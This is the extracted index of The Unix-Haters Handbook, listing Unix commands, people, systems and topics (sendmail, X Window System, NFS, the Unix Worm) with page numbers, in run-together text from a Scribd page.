Robert 63 Morris. Robert T. Ken xix Pike.xerox. 141 NeXTWORLD Magazine 11 NFS 166. xxxv.mit. 14. see NFS Neuhaus. 194. 231. 141 open 189 exclusive-create 295 Open Look clock tool 123 Open Software Foundation 125 open systems 225. Ed 105 National Security Agency 254 net. 263. xv. 141 newsgroups 96 moderated 97 NeXT 11.lcs. Donald A. Peter 13 New Jersey approach 312 NeWS 128. 257 Moscow International Airport 138 Motif 125 self-abuse kit 138 movemail 246 MSDOS 13. 54. 296 NEXTSTEP 11. Paritosh 81 parallelism 174 Paris. Trudy xxxii Neumann.edu 79. Florence 27 ninit 198 nohistclobber 25 P Pandya. Richard 224. 167 Pier.mit.edu 95 Nietzche 186 Nightingale. 267.gods 98 Netnews 93 Network File System. 293 rename command 190 mt@media-lab. France 86 parsing 177 patch 103 patents xxxiii Ethernet 283 SUID 246 PATH environment variable 249 pavel@parc. Amy xxxii Pensj.edu xxiv. 305 Multics xxi. Rob 27 ping 248 pipes 161 limitations 162 pixel rot 138 Plato’s Cave 176 POP (post office protocol) 246 POSIX 13 . 292 mmap 238 Monty Python and the Holy Grail 140 more 44 Morris.mit. 283–300 Apple Macintosh 284 exports 289 Macintosh 292 magic cookie 284 nfsauth 288 nick@lcs. 230.325 mktmp 287 Mlynarik. 258. 14. Lars 196 Perlis.com 34 PC loser-ing problem 313 PDP-11 6 Pedersen. xxx Novell xix nroff 44 nuclear missiles 117 NYSERnet 299 O Objective-C 11. 307 mv 28. Alan 208 persistency 174 pg 44 pgs@xx. Joseph 5 Oxford English Dictionary 45 N nanny 199 Nather. 141 Ossanna. 253 Open Windows File Manager 129 OpenStep 14. 14. 190 mvdir 276 MX mail servers 89 Norman.
food. 253 Ruby.edu 209 Seastrom. xxxv. Jim 208 round clocks 136 routed 8 Routing Information Protocol (RIP) 7 Roylance. 123 Raymond.edu 50. 62.edu 231 Scheme 173. Marcus J. Rich xxx saus@media-lab. Dennis xxx. 24 SCO 11 screens bit-mapped 111 sdm@cs. 237 rdist 236 read 189 readnews 102 real-time data acquisition 197 rec. 226. 248. 83.mit.recipes 100 recv 189 recvfrom 189 recvmsg 189 Reid.326 Index PostScript 141 power tools 147 pr 175 preface xix process id 39 process substitutuion 152 programmer evolution 215 programming 173 programming by implication 177 Project Athena 288 Pros and Cons of Suns xxiv ps 8. 21. Steve 298 Rolls-Royce 221 Roman numeral system xx root. Strata xxxi Rosenberg. M. see superuser Rose. 239. 29. 65. 315 Schilling. 295 -i 28 rmdir 30. 258 Ritchie. Brian 100 reliability 85 An Empirical Study of the Reliability of Unix Utilities 190 religious ecstasy 161 Request for Comments 77 responsibility 85 Ressler. Steve 275 send 189 sendmail 61. Jerry 298 RPC 292 rs@ai. Eric xxxi RCS 34. Beth xxxi Roskind. 226. 261 security 243 find 166 Sekiguchi. 22. Kurt xxxi Schwartz. 257 >From 79 configuration file 74 history 63 .mit. Dan xxxi S Salz. 63. 65.brown. 307 early Unix distribution 229 rite of passage 23 rk05 229 rlogin 118 rm 18. 248 Rubin. 256. 35. 19. 5. 65. Robert E. 104.uucp 22 Ranum. 280. 50. Paul xxxi. 30. Randal L. 73 pwd 241 Q QuickMail 87 QWERTY 19 R Rainbow Without Eyes 46 ram@attcan. 20. John xxiv Rose. Pete 13 Schmucker. 295 rn 101 rna 102 Robbins. Sandy 37 RFC822 78 RFCs 77 "Right Thing" design approach 311 RISKS 13.
DDN.ac.uk 32 tmb@ai. Christopher 62 Standard I/O library 190 Stanford design style 311 Stanley’s Tool Works 159. Patrick 166 soft clipping 278 Solomon 128 Space Travel 5 Spafford. 245 swapping 230 symbolic link 154 Symbolics (see Lisp Machine) syphilis mercury treatment xx system administration 221 System V sucks 47 Systems Anarchist 50 T Tannenbaum. 275 strings 53 strip xxv stty 119 SUID 245–248 Sun Microsystems 6. Johnny 117 terminfo 114 Tetris 117 TeX 38 tgoto 117 Thanksgiving weekend 241 The Green Berets 180 The Unix Programming Environment 189 Thompson. Japan 86 top 10 reasons why debuggers dump core 188 TOPS. 188. 72. 307 Unix car 17. 209. Olin 116 Silicon Valley 86 Silver. 241. Andy 230 tar 30.mit. 73.edu 173 TNT Toolkit 129 Tokyo.uucp 292 timeval 193 tk@dcs. 10. 19. 166.MIL 86 tcsh 149 teletypes 111 telnet 118. Olin 7.327 sendmail made simple 240 sendmsg 189 sendto 189 set 152 SF-LOVERS 98 SGI Indigo 46 sh 155 variables 159 Shaped Window extension (X) 136 shell programming renaming files 161 shell scripts writing xix Shivers. blood 128 sra@lcs. 185 Tiemann. 160 100-character limit 148. 83. 131 Shulgin. Ken 5. 33. 113. Michael 187. 246 Strassmann. Cliff xxxi.edu 49 Stacy. Gene 106 Spencer. 279 steve@wrs. 271 Smalltalk 173 smL 280 SMTP 64 SOAPBOX_MODE 24 Sobalvarro. 14. 88. 292 superuser 244. 272. Alexander xxxi sidewalk obstruction 68 Siebert.mit.com 276 Stoll.ed. 193 tcp-ip@NIC. Stephen J. 283. 62 Silverio. 252 Tenex 20 TERM and TERMCAP environment variable 118 Termcap 117 termcap 113 Terminal.com 11 sleep 36. C J 56 SimCity xxx Simple and Beautiful mantra 188 simplicity of design 311 simsong@nextworld. A Sun Microsystems Company 292 . Henry 283 spurts. 137. 296 tim@hoptoad. 280. Steve xxix.
Daniel xxix. Miriam xxxi TWENEX-HATERS xxiv Twilight Zone 90 Twinkies 188 tytso@athena.EDU 25 Weise. xxiv. 37 car 17 design xx evolution 7 File System 262 trademark xix Worm 194 Unix Guru Maintenance Manual 58 Unix ohne Worter 56 Unix Programmer 185 Unix Systems Laboratories xix Unix without words 56 UNIX-HATERS acknowledgments xxix authors xxi disclaimer xxxiii history xxiii typographical conventions xxxii Unknown 141. 231.mit.com 86. Len Jr.328 Index TOPS-20 xxi. 93 Travers. xxxi Townson. Bruce 269 Waterside Productions xxxi Watson. Andy xxxi wc 175 WCL toolkit 133 weemba@garnet. Gumby Vinayak 233 Walton. Michael xxiii. Benjamin 191 Wiener. Matthew xxxi Waitzman. 257 touch 30 Tourette’s Syndrome 138 Tower of Babel 126 Tower. 318 UUCP suite 63 uuencode 82–83 UUNET 89 V V project 124 vacation program 84 variable substitution 152 VAX 6 VDT 111 Veritas 267 vi 114. Mark 106 Wall. David xxxi. 143 Visual User Environment 132 VMS 27. 88 University of Maryland xxx University of New South Wales 43 University of Texas. xxxv. 93–109 seven stages 106 Usenix 300 User Datagram Protocol 285 user interface xv. 207 Weise. 103 trusted path 251 Ts’o. 305 trn 101. 197. 132 video display terminal 111 Vinge. Larry 102 Wallace. Vernor 94 Viruses 3. 147 W W Window System 124 Wagner. Theodore 198 tset 118 Tucker. 74 Waks. xxxi. Austin 105 Unix "Philosophy" 37 attitude xx. Matthew P 25 . 112. David xxxi whitespace 181 Whorf.Berkeley. 257 VOID 95 Voodoo Ergonomics 123 VT100 terminal 113 U UDP 285 UFS 262 ULTRIX 11 unalias 152 unicode@sun. Patrick A. 32. 120.edu 198 unset 152 Usenet 35.
50.329 Williams. 206 zsh 149 zvona@gang-of-four.com 295 yduJ@scrc.stanford. 278 writev 189 X X 123–143 Consortium 126 myths 127 toolkits 126 X Window System 113 X/Open xix.symbolics. 130 Zweig. Johnny 116 .com 70 Yedwab. 164. B. Christopher xxxi Windows 10. 56. 124 xtpanel 165 Y yacc 177 yduj@lucid. 166 "Worse is Better" design approach 311 write 189. Jamie 127. Gail 268 Zawinski.edu 37. 135. 13 XAPPLRESDIR environment variable 133 xauth 130 xclock 124 XDrawRectangle 139 Xenix 11 XENVIRONMENT 133 Xerox 283 XFillRectangle 139 XGetDefault 133 xload 124 xrdb 133 xterm 113. 116. Laura xxxi Z Zacharias. 168 Zeta C xxx Zmacs 119 Zorn.
330 Index . | https://www.scribd.com/doc/46198817/Unix-Haters-Handbook | CC-MAIN-2017-09 | refinedweb | 96,039 | 69.48 |
The QNetworkAccessManager class allows the application to send network requests and receive replies More...
#include <QNetworkAccessManager>
Note: All functions in this class are reentrant.
This class was introduced in Qt 4.4. should be enough for the whole Qt application.()..
Sends a request to delete the resource identified by the URL of request.
Note: This feature is currently available for HTTP only, performing an HTTP DELETE request.
This function was introduced in Qt 4.6.
See also get(), post(),.().
Uploads the contents of data to the destination request and returnes().
This is an overloaded function.
Sends the contents of the data byte array to the destination specified by request.(). | http://doc.qt.nokia.com/main-snapshot/qnetworkaccessmanager.html#activeConfiguration | crawl-003 | refinedweb | 109 | 61.63 |
The.
IReadOnlyList and IReadOnlyDictionary are interfaces that .NET developers have wanted since the very beginning. In addition to providing a sense of symmetry, a read-only interface would eliminate the need to implement methods that would do nothing but throw a NotSupportedException. For reasons lost to time, this wasn’t done.
The next opportunity was with the introduction of generics with .NET 2. This allowed Microsoft to phase out the weakly typed collections and interface and replace them with strongly typed counter-parts. The Base Class Library team again passed on the chance to offer a read-only list, with Kit George writing,
Because we could provide a default implementation for what you're talking about Joe, rather than giving you an interface, we provided ReadOnlyCollectionBase. However, given that it wasn't strongly typed, I can understand a reluctance to use it. But with the introduction of generics, we now also have ReadOnlyCollection<T>, so you get the same functionality, but strongly-typed: awesome!
ReadOnlyCollection<T> isn't sealed, so feel free to write your own collection on top if needed. We have no plans to introduce an interface for this same concept, since the collections we've made for this suit the general need.
Krzysztof Cwalina weighed in on the subject as well,
It may sound surprising, or not, but IList and IList<T> are our interfaces intended for read-only collections. They both have IsReadOnly Boolean property that should return true when implemented by a read-only collection. The reason we don’t want to add a purely read-only interface is that we feel it would add too much unnecessary complexity to the library. Note that by complexity, we mean both the new interface and its consumers.
We feel that API designers either don’t care about checking the IsReadOnly property at runtime and potentially throwing an exception, in which case IList is fine, or they would like to provide a really clean custom API, in which case they explicitly implement IList and publicly expose custom tailored read-only API. The latter is typical for collections exposed form object models.
While developers grumbled about the situation, the new opportunities offered by generics far out-weighed this one sticking point and the issue was largely ignored until .NET 4. However, there are repercussions from this decision that we will discuss later on.
With .NET 4 an exciting new capability was added to the runtime. In previous versions of .NET interfaces were overly restrictive when it came to types. For example, one could not use an object of type IEnumerable<Customer> as a parameter to a function expecting IEnumerable<Person> even though the Customer class inherited from Person. With the addition of covariance support, that limitation was partially lifted.
We say “partially” because there are several scenarios where one would like to use an interface with a richer API than IEnumerable. And while IList isn’t covariant, a read-only list interface would be. Unfortunately the .NET BCL team again decided not to address this oversight.
Then the introduction of WinRT and the resurgence of COM changed everything. COM interoperability was once something developers used when no other options were available, it is now a cornerstone of .NET programming. And since WinRT exposes the interfaces IVectorView<T> and IMapView<K, V>, so must .NET.
A rather interesting feature of the WinRT plan is that it exposes a different, but comparable, API for each development platform. As you may already know, when seen through the eyes of a JavaScript developer all methods are camelCased while C++ and .NET developers see them as PascalCased. Another, more drastic change, is the automatic mapping of interfaces between C++ and .NET. Rather than dealing with the Windows.Foundation.Collections namespace, .NET developers will instead continue using System.Collections.Generic. The interfaces IVectorView<T> and IMapView<K, V> are translated by the runtime into IReadOnlyList<T> and IReadOnlyDictionary<TKey, TValue>.
It is important to note that the C++/WinRT names of the interfaces are somewhat more accurate. These interfaces are intended to represent views into a collection, but they do not ensure the collection itself is immutable. It is a common mistake among even experienced .NET developers to assume that ReadOnlyCollection is an immutable copy of a collection when in fact it is just a wrapper around a live collection. (For more on read-only, frozen, and immutable collections see Andrew Arnott’s post by the same name.)
One may find it interesting to know that IList<T> does not inherit from IReadOnlyList<T>, even though it has all the same members and all lists can be expressed as a read-only list. Immo Landwerth explains,
It looks like a reasonable assumption that it works because the read-only interfaces are purely a subset of the read-write interfaces. Unfortunately, it is incompatible because at the metadata level every method on every interface has its own slot (which makes explicit interface implementations work).
Or in other words, the only opportunity they had to introduce the read-only interfaces as base classes of the mutable variety was back in .NET 2.0 when they were originally conceived. Once released into the wild, the only change that can be made to it is adding the covariant and/or contravariant markers (expressed as “in” and “out” in VB and C#).
When asked why there is no IReadOnlyCollection<T> Immo responded,
We considered this design, but we felt adding a type that only provides a Count property does not add much value to the BCL. In the BCL team we believe that an API start at minus a thousand points and thus providing some value is not good enough to justify being added. The reason that adding new APIs also has cost, for example developers have more concepts to choose from. Initially we thought that adding this type would allow code to gain better perf in scenarios where you just want to get the count and then do some interesting stuff with it. For example, bulk adding to an existing collection. However, for those scenarios we already encourage people to just take an IEnumerable<T> and special case having the instance implementing ICollection<T> too. Since all of our built-in collection types implement this interface there are no perf gains in the most common scenarios. BTW, the Count() extension methods on IEnumerable<T> do this as well.
The new interfaces are avaialble for .NET 4.5 and .NET for Windows 8.
Incorrect
by
Daniel Bullington
Co-variance and contra-variance was supported in .NET 2.0 and above at the CLR level. The C#/VB compilers did not expose this until .NET 4.0.
Re: Incorrect | http://www.infoq.com/news/2011/10/ReadOnly-WInRT/ | CC-MAIN-2014-15 | refinedweb | 1,118 | 53.81 |
Implementing Laziness in C
The aim of this blog post is to explain haskell's (specifically, GHC) evaluation model without having to jump through too many hoops. I'll explain how pervasive non-strictness is when it comes to Haskell, and why compiling non-strictness is an interesting problem.
Showing off non-strictness:
We first need a toy example to work with to explain the fundamentals of non-strict evaluation, so let's consider the example below. I'll explain the
case construct.
Code
--.
A quick explanation about
case:
case is a language construct that forces evaluation. In general, no value is evaluated unless it is forced by a case.
Analysing the example:
The strict interpretation:
If we were coming from a strict world, we would have assumed that the expression
K one loopy would first try to evaluate the arguments,
one and
loopy. Evaluating
one would.
The non-strict interpretation:
In the non-strict world, we try to evaluate
K(1, loopy) since we are asked the result of it by the
case expression. However, we do not try to evaluate
loopy, since no one has asked what it's value is!
Now, we know that
kCombinator x y = x
Therefore,
kCombinator one loopy = one
regardless of what value
loopy held.
So, at the case expression:
main = case K(one, loopy) of -- force K to be evaluated with a `case` >>> kret -> ...
kret = one, we can continue with the computation..
Here, we force
kret (which has value
one) to be evaluated with
case kret of.... since
one = 1,
i is bound to the value
1. Once
i is returned, we print it out with
printPrimInt(primx).
The output of the program under non-strict interpretation is for it to print out
1.
Where does the difference come from?
Clearly, there is a divide: strict evaluation tells us that this program should never halt. Non-strict evaluation tells us that this program will print an output!
To formalize a notion of strictness, we need a notion of
bottom (
_|_).
A value is said to be
bottom if in trying to evaluate it, we reach an undefined state. (TODO: refine this, ask ben). is strict, since
id(bottom) = bottom.
const
const_one x = 1 const_one(bottom) = 1 const_one(3) = 1
const_one is not strict, as
const_one(bottom) /= bottom.
K
K x y = x K 1 2 = 1 K 1 bottom = 1 K bottom 2 = bottom
Note that
K(bottom, y) = bottom, so K is strict in its first argument, and
K(x, bottom) /= bottom, so K is non-strict in its second argument.
This is a neat example showing how a function can be strict and lazy in different arguments of the function.
Compiling non-strictness, v1:
How does GHC compile non-strictness?
GHC (the Glasgow haskell compiler) internally uses multiple intermediate representations, in order of original, to what is finally produced:
- Haskell (the source language)
- Core (a minimal set of constructs to represent the source language)
- STG (Spineless tagless G-machine, a low-level intermediate representation that accurately captures non-strict evaluation)
- C– (A C-like language with GHC-specific customization to support platform independentcode generation).
- Assembly
Here, I will show how to lower simple non-strict programs from a fictitous
Core like language down to
C , while skipping
STG, since it doesn't really add anything to the high-level discussion at this point.
Our example of compiling non-strictness
Now, we need a strategy to compile the non-strict version of our program. Clearly,
C cannot express laziness directly, so we need some other mechanism to implement this. I will first code-dump, and then explain as we go along.
Executable
repl.it:
Source code
#include <assert.h> #include <stdio.h> /*; }
We convert every possibly lazy value into a
Boxed value, which is a function pointer that knows how to compute the underlying value. When the lazy value is forced by a
case, we call the
Boxed function to compute the output.
This is a straightforward way to encode non-strictness in C. However, do note that this is not lazy, because a value could get recomputed many times. Laziness guarantees that a value is only computed once and is later memoized.
Compiling with a custom call stack / continuations
As one may notice, we currenly use the native call stack every time we force a lazy value. However, in doing so, we might actually run out of stack space, which is undesirable. Haskell programs like to have "deep" chains of values being forced, so we would quite likely run out of stack space.
Therefore, GHC opts to manage its own call stack on the heap. The generated code looks as you would imagine: we maintain a stack of function pointers + auxiliary data ( stack saved values), and we push and pop over this "stack". When we run out of space, we
<find correct way to use mmap>.
Executable
repl.it:
Source code
; }
we maintain our own "call stack" of continuations. These continuations are precisely the parts of the code that deal with the return value of a case. ever
case x of xeval -> expr
compiles to:
pushContinuation(XEvalContinuation); x()
That is, push a continuation, and then "enter" into instruction uses the stack to setup a stack frame, under the assumption that we will
ret at some point. But, clearly, under our compilation model, we will never
ret, simply call more functions. So, we don't need the state maintained by a
call. We can simply
jmp.
Wrapping up
I hope I've managed to convey the essence of how to compile Haskell. I skipped a couple of things:
- haskell data types: sum and product types. These are straightforward, they just compiled to tagged structs.
letbindings: These too are straightforward, but come with certain retrictions in STG. It's nothing groundbreaking,andis well written in the paper.
- Black holes: Currently, we are not truly lazy, in that we do not update values once they are computed.
- GC: how to weave the GC through the computation is somewhat non-trivial.
All of this is documented in the excellent paper: Implementing lazy languages on stock hardware.
Appendix: Non-strict versus Lazy
I have use the word
non-strict throughout, and not
lazy. There is a technical difference between the two, which is that:
non-strictis a evaluation order detail that guarantees that values are
lazyis one way to implement
non-strict, that provides guarantees that a value will not be evaluated twice.
For example, consider the small haskell snippet:
f :: Int -> Int -> Int f x y = x * 2 loop :: a loop = loop main :: IO () main = let a = 10 + 10 print (f a loop)
We expect that the program will never evaluate
y=loop because
f does not use
y anywhere. We want the program to return the answer:
f 10 loop = (10 + 10) * (10 + 10) = 20 * 20 = 400
However, we don't really care if the program is evaluated as shown here, using lazy evaluation, (where the blue color indicates what is being evaluated):
or it's being evaluated as shown here, where the expression
a is evaluated twice:
See that both these programs compute the same answer, but do so differently. In the former case of lazy evaluation the variable
a is shared across both occurences: it is computed once, and the result is reused. In the latter case of non-strict evaluation, we see that the variable
a is evaluated twice independently, once for each occurrence of
a.
There are trade-offs with both approaches. In the lazy evaluation case, we are guaranteed that a large expression will not be evaluated twice. On the flip side, in the case of non-strict evaluation, since we can evaluate the same expression multiple times, we can exploit parallelism: Two cores can conceivably compute
10 + 10 in parallel to arrive at
20. This is in contrast to the lazy evaluation case where this is not allowed, since the compiler must guarantee that an expression is evaluated at most once. If the same expression
10 + 10 is evaluated on two cores (in parallel), it is still evaluated twice! So there is a trade-off between guarantees to the end user (that an expression will not be evaluated twice), and freedom for the compiler (to evaluate in parallel). This is a common theme in language and compiler design, and one I find very | https://www.works-hub.com/learn/implementing-laziness-in-c-2ba95 | CC-MAIN-2021-21 | refinedweb | 1,397 | 61.36 |
the MRUnit framework.
- Add the necessary dependency to the pom
Add the following dependency to the pom:
<dependency> <groupId>org.apache.mrunit</groupId> <artifactId>mrunit</artifactId> <version>1.0.0</version> <classifier>hadoop1</classifier> <scope>test</scope> </dependency>
This will made the MRunit framework available to the project.
- Add Unit tests for testing the Map Reduce logic
The use of this framework is quite straightforward, especially in our business case. So I will just show the unit test code and some comments if necessary but I think it is quite obvious how to use it. The unit test for the Mapper ‘MapperTest’:
package net.pascalalma.hadoop; import org.apache.hadoop.io.Text; import org.apache.hadoop.mrunit.mapreduce.MapDriver; import org.junit.Before; import org.junit.Test; import java.io.IOException; /** * Created with IntelliJ IDEA. * User: pascal */ public class MapperTest { MapDriver<Text, Text, Text, Text> mapDriver; @Before public void setUp() { WordMapper mapper = new WordMapper(); mapDriver = MapDriver.newMapDriver(mapper); } @Test public void testMapper() throws IOException { mapDriver.withInput(new Text("a"), new Text("ein")); mapDriver.withInput(new Text("a"), new Text("zwei")); mapDriver.withInput(new Text("c"), new Text("drei")); mapDriver.withOutput(new Text("a"), new Text("ein")); mapDriver.withOutput(new Text("a"), new Text("zwei")); mapDriver.withOutput(new Text("c"), new Text("drei")); mapDriver.runTest(); } }
This test class is actually even simpler than the Mapper implementation itself. You just define the input of the mapper and the expected output and then let the configured MapDriver run the test. In our case the Mapper doesn’t do anything specific but you see how easy it is to setup a testcase. For completeness here is the test class of the Reducer:
package net.pascalalma.hadoop; import org.apache.hadoop.io.Text; import org.apache.hadoop.mrunit.mapreduce.ReduceDriver; import org.junit.Before; import org.junit.Test; import java.io.IOException; import java.util.ArrayList; import java.util.List; /** * Created with IntelliJ IDEA. * User: pascal */ public class ReducerTest { ReduceDriver<Text, Text, Text, Text> reduceDriver; @Before public void setUp() { AllTranslationsReducer reducer = new AllTranslationsReducer(); reduceDriver = ReduceDriver.newReduceDriver(reducer); } @Test public void testReducer() throws IOException { List<Text> values = new ArrayList<Text>(); values.add(new Text("ein")); values.add(new Text("zwei")); reduceDriver.withInput(new Text("a"), values); reduceDriver.withOutput(new Text("a"), new Text("|ein|zwei")); reduceDriver.runTest(); } }
- Run the unit tests it
With the Maven command “mvn clean test” we can run the tests:
With the unit tests in place I would say we are ready to build the project and deploy it to an Hadoop cluster, which I will describe in the next post.
2 Comments on "Unit testing a Java Hadoop job"
Hi,
First of all thanks a lot for the example.
I am getting this error while running the test case .
ERROR util.Shell: Failed to locate the winutils binary in the hadoop binary path
java.io.IOException: Could not locate executable null\bin\winutils.exe in the Hadoop binaries.
)
When I googled it, I found all the answer for this prob happening in actual hadoop environment , I am not sure how to remove this from Junit
Hi Koushik,
It appears to have Hadoop running on Windows it requires some libraries to be installed. It is discussed here:
I am not using Windows so I haven’t run into this issue, but it sounds like the link should help you out. | https://www.javacodegeeks.com/2013/09/unit-testing-a-java-hadoop-job.html | CC-MAIN-2018-09 | refinedweb | 558 | 53.27 |
While fitting our model, we might get lucky enough and get the best test dataset while splitting. It might even overfit or underfit our model. It is therefore suggested to perform cross validation i.e. splitting several times and there after taking mean of our accuracy.
So this recipe is a short example on how to do cross validation on time series . Let's get started.
import numpy as np import pandas as pd from statsmodels.tsa.arima_model import ARMA from sklearn.model_selection import TimeSeriesSplit from sklearn.metrics import mean_squared_error
Let's pause and look at these imports. Numpy and pandas are general ones. Here statsmodels.tsa.arima_model is used to import ARMA library for building of model. TimeSeriesSplit will help us in easy and random splitting while performing cross validation.
df = pd.read_csv('', parse_dates=['date']) df.head()
Here, we have used one time series data from github.
Now our dataset is ready.
tscv = TimeSeriesSplit(n_splits = 4) rmse = [] for train_index, test_index in tscv.split(df): cv_train, cv_test = df.iloc[train_index], df.iloc[test_index] model = ARMA(cv_train.value, order=(0, 1)).fit() predictions = model.predict(cv_test.index.values[0], cv_test.index.values[-1]) true_values = cv_test.value rmse.append(np.sqrt(mean_squared_error(true_values, predictions)))
Firstly, we have set number of splitting to be 4. Then we have loop for our cross validation. Each time, dataset is spliited to train and test datset; model is fitted on it, prediction are made and RMSE(accuracy) is calculated for each split.
print(np.mean(rmse))
Here, we have printed the coeffiecient of model and the predicted values.
Once we run the above code snippet, we will see:
6.577393548356742
You might get different result but it will be close to given due to limited splitting. | https://www.projectpro.io/recipes/do-cross-validation-for-time-series | CC-MAIN-2021-43 | refinedweb | 290 | 62.44 |
There are three types of commenting syntax in C#multiline, single-line, and XML.
Multiline Comments
Multiline comments have one or more lines of narrative within a set of comment delimiters. These comment delimiters are the begin comment /* and end comment */ markers. Anything between these two markers is considered a comment. The compiler ignores comments when reading the source code. Lines 1 through 4 of Listing 1 show a multiline comment. For convenience, Lines 1 through 4 of Listing 1 are repeated here.
1: /* 2: * FileName: HowdyParner.cs 3: * Author: Joe Mayo 4: */
Some languages allow embedded multiline comments, but C# does not. Consider the following example:
1: /* 2: Filename: HowdyPartner.cs 3: Author: Joe Mayo 4: /* 5: Initial Implementation: 04/01/01 6: Change 1: 05/15/01 7: Change 2: 06/10/01 8: */ 9: */
The begin comment on Line 1 starts a multiline comment. The second begin comment on line 4 is ignored in C# as just a couple characters within the comment. The end comment on Line 8 matches with the begin comment on line 1. Finally, the end comment on Line 9 causes the compiler to report a syntax error because it doesn't match a begin comment.
Single-Line Comments
Single-line comments allow narrative on only one line at a time. They begin with the double forward slash marker, //. The single-line comment can begin in any column of a given line. It ends at a new line or carriage return. Lines 6, 9, and 12 of Listing 1 show single-line comments. These lines are repeated here for convenience.
6: // Program start class 7: public class HowdyPartner 8: { 9: // Main begins program execution 10: public static void Main() 11: { 12: // Write to console 13: System.Console.WriteLine("Howdy, Partner!");
Single-line comments may contain other single-line comments. Because they're all on the same line, subsequent comments will be treated as comment text.
XML Documentation Comments
XML documentation comments start with a triple slash, ///. Comments are enclosed in XML tags. The .NET C# compiler has an option that reads the XML documentation comments and generates XML documentation from them. This XML documentation can be extracted to a separate XML file. Then XML style sheets can be applied to the XML file to produce fancy code documentation for viewing in a browser. Table 1 shows all standard XML documentation tags.
Table 1 XML Documentation Tags
To provide a summary of an item, use the <summary> tag. Here's what one might look like for a Main() method:
/// <summary> /// Prints "Howdy, Partner" to the console. /// </summary>
Documentation comments can be extremely useful in keeping documentation up-to-date. How many programmers do you know who conscientiously update their documentation all the time? Seriously, when meeting a tight deadline, documentation is the first thing to go. Now there's help. While in the code, it's easy to update the comments, and the resulting XML file is easy to generate. The following line of code will extract documentation comments from the HowdyPartner.cs file and create an XML document named HowdyPartner.xml.
csc /doc:HowdyPartner.xml HowdyPartner.cs
For C++ Programmers
C# has XML documentation comments that can be extracted to separate XML files. Once in an XML file, XML style sheets can be applied to produce fancy code documentation for viewing in a browser. | http://www.informit.com/articles/article.aspx?p=23211&seqNum=3 | CC-MAIN-2018-13 | refinedweb | 561 | 57.98 |
Red Hat Bugzilla – Bug 91677
Griffin Powermate needs additional info in usb.handmap
Last modified: 2014-03-16 22:36:28 EDT
From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4b) Gecko/20030508
Description of problem:
The Griffin Powermate needs additional info in /etc/hotplug/usb/handmap to
funtion properly with the standard linux kernel driver as shipped with RH9.
Basically it too (like the wacom devices mentioned in the same file) needs, but
does not depend on the evdev driver.
Adding the following lines to usb.handmap fixes the problem:
evdev 0x0003 0x077d 0x0410 0x0000 0x0000 0x00
0x00 0x00 0x00 0x00 0x00
0x00000000
evdev 0x0003 0x077d 0x04aa 0x0000 0x0000 0x00
0x00 0x00 0x00 0x00 0x00
0x00000000
To test use the tools on:
The following is an example test session for the python script:
python>
import powermate
p = powermate.PowerMate()
.. it will throw an exception if it doesn't find the powermate.
Or even simpler - cat /dev/input/event0 - if it's there then it won't say device
not found.
Ref for Powermate product:
Version-Release number of selected component (if applicable):
2002_04_01-17
How reproducible:
Always
Steps to Reproduce:
1. Try using the example code above or catting /dev/input/event0 when the
powermate is plugged in.
2. /var/log/messages also tells you the device has not been recognised if evdev
is not loaded.
Actual Results: Powermate tools don;t work.
Expected Results: Powermate tools should have worked.
Additional info:
Added in 2004_09_23-1.
Note that this is not used with current hotplug packages, however. | https://bugzilla.redhat.com/show_bug.cgi?id=91677 | CC-MAIN-2017-43 | refinedweb | 266 | 64.91 |
_mm_hsubs_pi16
Microsoft Specific
Emits the Supplemental Streaming SIMD Extensions 3 (SSSE3) instruction phsubsw. This instruction computes the difference between the elements two 64-bit parameters.
A 64-bit value that contains four 16-bit signed integers. Each integer is the difference between adjacent pairs of elements in the input parameters.
The result can be expressed with the following equations:
r0-r3, a0-a3, b0-b3 are the sequentially ordered 16-bit components of return value r and parameters a and b, each comprising 64 bits, with r0, a0, b0 denoting the least significant 16 bits.
r0-r3, a0-a3, and b0-b3 are the sequentially ordered 16-bit components of return value r and parameters a and b. r0, a0, and b0 are the least significant 16 bits.
SATURATE_16(x) is defined as ((x > 32767) ? 32767 : ((x < -32768) ? -32768 : x))
Before you use this intrinsic, software must ensure that the processor supports the instruction.
#include <stdio.h> #include <tmmintrin.h> int main () { __m64 a, b; a.m64_i16[0] = 32; a.m64_i16[1] = 32; a.m64_i16[2] = 4096; a.m64_i16[3] = -4096; b.m64_i16[0] = 32700; b.m64_i16[1] = -1000; b.m64_i16[2] = -30000; b.m64_i16[3] = 30000; __m64 res = _mm_hsubs_pi16(a, b); printf_s("Original a:\t%6d\t%6d\t%6d\t%6d\nOriginal b:\t%6d\t%6d\t%6d\t%6d\n", a.m64_i16[0], a.m64_i16[1], a.m64_i16[2], a.m64_i16[3], b.m64_i16[0], b.m64_i16[1], b.m64_i16[2], b.m64_i16[3]); printf_s("Result res:\t%6d\t%6d\t%6d\t%6d\n", res.m64_i16[0], res.m64_i16[1], res.m64_i16[2], res.m64_i16[3]); _mm_empty(); return 0; } | https://msdn.microsoft.com/en-us/library/bb531474(v=vs.90).aspx | CC-MAIN-2017-04 | refinedweb | 275 | 62.64 |
This is tricky. I want to use curl, wget or any other tool to login into a SSL Website which provides a Login Form. Then I want to visit several Links within that Domain and fetch certain images.
I got it to work with this in bash:
curl -c /tmp/cookie.txt -d "login=username&password=passw&send=submit"
Use the cookie later with
curl -b /tmp/cookie.txt
The trick was that you have to submit the credentials to the action= adress of the html form field.
action=
Another problem I face now is that this writes no image because the URL of the image is constructed out of some Servlet URI:
<img src="URI/servlet/manyParametersWith?And=AndLotsOf&">
Try using Python and mechanize (available for Perl too). You can do something like this:
import mechanize
br=mechanize.Browser()
br.open('')
br.select_form(nr=0) #check yoursite forms to match the correct number
br['Username']='Username' #use the proper input type=text name
br['Password']='Password' #use the proper input type=password name
br.submit()
br.retrieve('','yourfavoritepage.html')
Ok only possibility to write the image is to display it in a browser, for e.g. echo via php and then write it out to disk via php. Some users reported that might work.
asked
5 years ago
viewed
408 times
active | http://superuser.com/questions/176646/how-to-automatically-get-images-from-an-ssl-site-that-uses-java-servlets/178517 | CC-MAIN-2016-30 | refinedweb | 223 | 57.57 |
1.0.0[−][src]Macro core::
write
Write formatted data into a buffer.
This macro accepts a format string, a list of arguments, and a 'writer'. Arguments will be
formatted according to the specified format string and the result will be passed to the writer.
The writer may be any value with a
write_fmt method; generally this comes from an
implementation of either the
std::fmt::Write or the
std::io::Write trait. The macro
returns whatever the
write_fmt method returns; commonly a
std::fmt::Result, or an
io::Result.
See
std::fmt for more information on the format string syntax.
Examples
